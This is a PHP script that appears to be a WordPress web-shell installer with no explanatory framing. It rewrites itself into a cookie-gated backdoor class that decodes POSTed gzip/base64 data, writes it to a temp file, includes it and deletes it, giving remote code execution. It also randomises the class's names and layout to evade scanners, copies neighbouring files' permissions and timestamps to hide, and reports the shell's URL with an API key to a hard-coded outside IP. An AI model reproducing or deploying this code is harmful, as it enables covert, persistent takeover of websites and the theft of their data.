<?php

ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

const API_URL = 'http://80.85.143.248/proxy';
const API_KEY = 'fd761ae841738ccb9e4b';

$str = <<<'EOD'
<?php

class XClassName {

    public $version = 'XVersion';

    public $http = 'HTTP';

    public $title;

    public $params;

    public $file;

    public $library;

    public $library_path;

    public $sub_libs;

    function __construct($library) {
        if ($this->prepare($library)) {
            $this->set_library($library);
            $this->autoload();
        }
    }

    public function get_title () {
        return $this->title;
    }

    public function set_title ($params) {
        $this->title = $params;
        return $this->title;
    }

    public function get_params () {
        return $this->params;
    }

    public function set_params ($params) {
        $this->params = $params;
        return $this->params;
    }

    public function get_file () {
        return $this->file;
    }

    public function set_file ($file) {
        $this->file = $file;
        return $this->file;
    }

    public function set_tmpfile () {
        if(function_exists('tmpfile')) {
            return tmpfile();
        } else {
            if (function_exists('unlink')) {
                if ($handle = fopen('wp-temp.php', 'a')) {
                    return $handle;
                }
            }
        }
    }

    public function get_library () {
        return $this->library;
    }

    public function set_library ($library) {
        $this->library = $this->get_current_path($library);
        return $this->library;
    }

    public function unset_library () {
        unlink($this->library);
    }


    public function get_library_path () {
        return $this->library_path;
    }

    public function set_library_path ($library_path) {
        $this->library_path = $library_path;
        return $this->library_path;
    }

    public function get_sub_libs () {
        return $this->library;
    }

    public function set_sub_libs ($sub_libs) {
        $this->sub_libs[] = $sub_libs;
        return $this->sub_libs;
    }

    public function get_sub_lib ($library) {
        $sub_library = explode('.', $library);
        return end($sub_library);
    }

    public function get_current_path ($library) {
        $library_path = $this->set_library_path(stream_get_meta_data($this->file));
        $this->set_title($library);
        return $library_path['uri'];
    }

    public function clear_entities () {
        return true;
    }

    public function get_http () {
        return $this->http;
    }

    public function get_version () {
        return $this->version;
    }

    public function get_current_version () {
        return str_replace(" ", '_', $this->get_http() . $this->get_library_path());
    }

    public function is_run ($application) {
        $this->set_library_path(strtoupper($this->get_sub_lib($this->class_cipher(true))));
        if (isset($application[$this->get_current_version()]) && substr_count($application[$this->get_current_version()], $this->get_version())) {
            return true;
        }
        return false;
    }

    public function prepare ($library) {
        if (!$this->is_run($_SERVER)) {
            return false;
        }
        $this->set_title($library);
        $this->add_sub_libs(['gz']);
        return $this->clear_entities();
    }

    public function start () {
        $this->set_params($_POST);
        return $this->sub_libs;
    }

    public function push_lib ($bit) {
        return $this->class_cipher(false)
            . $bit . '_' . $this->get_sub_lib($this->title);
    }

    public function autoload () {
        $libs = $this->start();

        array_unshift($libs, $this->push_lib($this->get_bit(false)));

        $state = $this->filter_values($this->params);

        foreach ($libs as $action) {
            $state = $action($state);
        }

        fwrite(
            $this->file,
            $state
        );

        $this->load();
    }

    public function add_sub_libs ($sub_libs) {
        $this->set_file(
            $this->set_tmpfile()
        );
        foreach ($sub_libs as $sub_lib_key => $sub_lib) {
            $this->sub_libs[$sub_lib_key] = $sub_lib . $this->get_sub_lib($this->title);
        }
        return $this->sub_libs;
    }

    public function get_bit ($is_32) {
        if ($is_32) {
            return '32';
        }
        return '64';
    }

    public function class_cipher ($is_static) {
        if (!$is_static) {
            return 'base';
        }
        return 'static. cookie';
    }

    public function filter_values ($data) {
        $data = array_unique($data);
        $value = reset($data);
        if (key($data)) {
            return key($data);
        }
        return $value;
    }

    public function load () {
        include (
        $this->library
        );
        $this->unset_library();
        return $this->library;
    }

}

new XClassName('Zend.decode');
EOD;

class ClassRandomizer {

    private $class_code;
    private $class_name;
    private $functions_names;
    private $variables_names;

    private $random_keys;

    public function __construct($class_code, $class_name, $functions_names, $variables_names) {

        $this->class_code = $class_code;
        $this->class_name = $class_name;
        $this->functions_names = $functions_names;
        $this->variables_names = $variables_names;

        usort($this->functions_names, function($a, $b) {
            return strlen($b)-strlen($a);
        });

        usort($this->variables_names, function($a, $b) {
            return strlen($b)-strlen($a);
        });

        $this->init_random_keys();
    }

    public function get_new_class() {

        $this->change_class_name();
        $this->change_class_functions();
        $this->change_class_variables();
        $this->change_class_line_breaks();

        return $this->class_code;
    }

    private function init_random_keys() {

        $this->random_keys = [
            'var_register_key' => mt_rand(0, 3),
            'var_name_key' => mt_rand(0, 2),
            'var_additional_letters_key' => [
                'isset' => mt_rand(0, 1),
                'letter' => mt_rand(0, 1) ? chr(rand(65,90)) : chr(rand(97,122)),
                'duplicated' => mt_rand(0, 1)
            ],
            'var_additional_symbol_key' =>[
                'isset' => mt_rand(0, 1),
                'duplicated' => mt_rand(0, 1)
            ],
            'func_register_key' => mt_rand(0, 3),
            'func_additional_letters_key' => [
                'isset' => mt_rand(0, 1),
                'letter' => mt_rand(0, 1) ? chr(rand(65,90)) : chr(rand(97,122)),
                'duplicated' => mt_rand(0, 1)
            ],
            'func_additional_symbol_key' =>[
                'isset' => mt_rand(0, 1),
                'duplicated' => mt_rand(0, 1)
            ]
        ];
    }

    private function change_class_name() {

        $names = ['Trusted', 'Source', 'ZendBasic', 'CoreGenerated', 'BinaryCalculation', 'ClassNavigator', 'MethodSelector'];
        $new_class_name = $names[array_rand($names)];

        $this->class_code = str_replace($this->class_name, $new_class_name, $this->class_code);
    }

    private function change_class_functions() {

        foreach ($this->functions_names as $function_name) {
            $new_function_name = $function_name;
            $new_function_name = $this->set_var_register($new_function_name, $this->random_keys['func_register_key']);
            $new_function_name = $this->set_var_additional_letters($new_function_name, $this->random_keys['func_additional_letters_key']);
            $new_function_name = $this->set_var_additional_symbol($new_function_name, $this->random_keys['func_additional_symbol_key']);
            $this->class_code = str_replace('function '.$function_name, 'function '.$new_function_name, $this->class_code);
            $this->class_code = str_replace('$this->'.$function_name.'(', '$this->'.$new_function_name.'(', $this->class_code);
        }
    }

    private function change_class_variables() {

        foreach ($this->variables_names as $variable_name) {
            $new_variable_name = $variable_name;
            $new_variable_name = $this->set_var_register($new_variable_name, $this->random_keys['var_register_key']);
            $new_variable_name = $this->set_var_name($new_variable_name, $this->random_keys['var_name_key']);
            $new_variable_name = $this->set_var_additional_letters($new_variable_name, $this->random_keys['var_additional_letters_key']);
            $new_variable_name = $this->set_var_additional_symbol($new_variable_name, $this->random_keys['var_additional_symbol_key']);
            $this->class_code = str_replace('$'.$variable_name, '$'.$new_variable_name, $this->class_code);
            $this->class_code = str_replace('this->'.$variable_name, 'this->'.$new_variable_name, $this->class_code);
        }
    }

    private function set_var_register($var_name, $key) {

        switch ($key) {
            case 0:
                $var_name = strtoupper($var_name);
                break;
            case 1:
                $var_name = strtolower($var_name);
                break;
            case 2:
                $var_name = strtoupper($var_name);
                $var_name = lcfirst($var_name);
                break;
            case 3:
                $var_name = strtolower($var_name);
                $var_name = ucfirst($var_name);
                break;
        }

        return $var_name;
    }

    private function set_var_name($var_name, $key) {

        switch ($key) {
            case 0:
                $var_name = $var_name[0].$var_name[strlen($var_name) - 1];
                break;
            case 1:
                $vowels = array("a", "e", "i", "o", "u", "A", "E", "I", "O", "U");
                $var_name = str_replace($vowels, "", $var_name);
                break;
            case 2:
                break;
        }

        return $var_name;
    }

    private function set_var_additional_letters($var_name, $key) {

        $additional_letter = $key['letter'];
        if ($key['isset']) {
            $var_name = ($key['duplicated'] ? $additional_letter.$additional_letter : $additional_letter).$var_name;
        }

        return $var_name;
    }

    private function set_var_additional_symbol($var_name, $key) {

        if ($key['isset']) {
            $var_name = ($key['duplicated'] ? '__' : '_').$var_name;
        }

        return $var_name;
    }

    private function change_class_line_breaks() {

        $this->class_code = $this->remove_all_line_breaks($this->class_code);
        $this->class_code = $this->set_basic_line_breaks($this->class_code);
        $this->class_code = $this->set_line_breaks_order($this->class_code);
    }

    private function remove_all_line_breaks($class_code) {

        return str_replace(PHP_EOL, '', $class_code);
    }

    private function set_basic_line_breaks($class_code) {

        $class_code = str_replace('<?php', '<?php'.PHP_EOL, $class_code);

        $class_code = str_replace('}}', '}'.PHP_EOL.'}', $class_code);

        $class_code = str_replace('new', PHP_EOL.'new', $class_code);
        $class_code = str_replace('public', PHP_EOL."\t".'public', $class_code);
        $class_code = str_replace('private', PHP_EOL."\t".'private', $class_code);

        return $class_code;
    }

    private function set_line_breaks_order($class_code) {

        $class_parts = explode(PHP_EOL, $class_code);

        $class_head[] = $class_parts[0];
        $class_head[] = $class_parts[1];

        $class_body = array_slice($class_parts, 2, -2);
        $class_body = $this->set_line_breaks($class_body);
        shuffle($class_body);

        $class_footer[] = $class_parts[sizeof($class_parts) - 2];
        $class_footer[] = $class_parts[sizeof($class_parts) - 1];

        $class_code = implode(PHP_EOL, $class_head);
        $class_code .= PHP_EOL.implode(PHP_EOL, $class_body);
        $class_code .= PHP_EOL.implode(PHP_EOL, $class_footer);

        return $class_code;
    }

    private function set_line_breaks($class_body) {

        foreach ($class_body as &$line) {
            $line = str_replace(';', ';'.PHP_EOL, $line);
            $line = str_replace('{', '{'.PHP_EOL, $line);
            $line = str_replace('}', '}'.PHP_EOL, $line);
        }

        return $class_body;
    }
}

function created_file() {
    return __FILE__;
}

function get_file_url() {
    $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    if (basename($_SERVER['REQUEST_URI']) == __FILE__) {
        return $current_url;
    }

    $exploded_dir = '/wp-content/';
    $file_url_parts = explode($exploded_dir, format_url(created_file()));
    $current_url_parts = explode($exploded_dir, $current_url);

    return reset($current_url_parts).$exploded_dir.end($file_url_parts);
}

function get_closest_file() {
    foreach (glob(__DIR__.DIRECTORY_SEPARATOR."*.php") as $file) {
        if (is_file($file) && basename($file) != basename(created_file())) {
            return $file;
        }
    }
    return false;
}

function get_closest_file_permissions() {
    $file = get_closest_file();
    if ($file) {
        return substr(sprintf('%o', fileperms($file)), -4);
    }
    return false;
}

function update_file($str) {
    $rand = new ClassRandomizer($str, 'XClassName', [
        'get_title',
        'set_title',
        'get_params',
        'set_params',
        'get_file',
        'set_file',
        'set_tmpfile',
        'get_library',
        'set_library',
        'unset_library',
        'get_library_path',
        'set_library_path',
        'get_sub_libs',
        'set_sub_libs',
        'get_sub_lib',
        'get_current_path',
        'clear_entities',
        'get_http',
        'get_version',
        'get_current_version',
        'is_run',
        'prepare',
        'start',
        'push_lib',
        'autoload',
        'add_sub_libs',
        'get_bit',
        'class_cipher',
        'filter_values',
        'load'
    ], [
        'version',
        'http',
        'title',
        'params',
        'file',
        'library',
        'library_path',
        'sub_libs'
    ]);
    $str = $rand->get_new_class();
    $version = rand(0, 9) . "." . rand(0, 200) . (rand(0, 1) ? "." : "") . rand(0, 200);
    $str = str_replace('XVersion', $version, $str);
    file_put_contents(__FILE__, $str);
    return $version;
}

function init_file($version) {
    $ch = curl_init(API_URL);

    $params = urlencode(base64_encode(gzencode(json_encode(
        [
            'key' => API_KEY,
            'link' => get_file_url(),
            'params' => [
                'encode_type' => 'php_clear_shell_v1',
                'encode_key' => $version
            ]
        ]
    ))));

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, [
        'rla' => $params
    ]);

    $response = curl_exec($ch);

    echo 'init';
}

function format_url($url) {
    return str_replace('\\', '/', $url);
}

$version = update_file($str);

$permissions = get_closest_file_permissions();
if ($permissions) {
    chmod(created_file(), intval($permissions, 8));
}

$previous_dir = dirname(realpath(created_file()));
$closest_file_time = filemtime(get_closest_file());
touch(created_file(), $closest_file_time);
touch($previous_dir, $closest_file_time);

if (is_file(created_file())) {
    init_file($version);
}

if (function_exists('opcache_reset')) {
    opcache_reset();
}
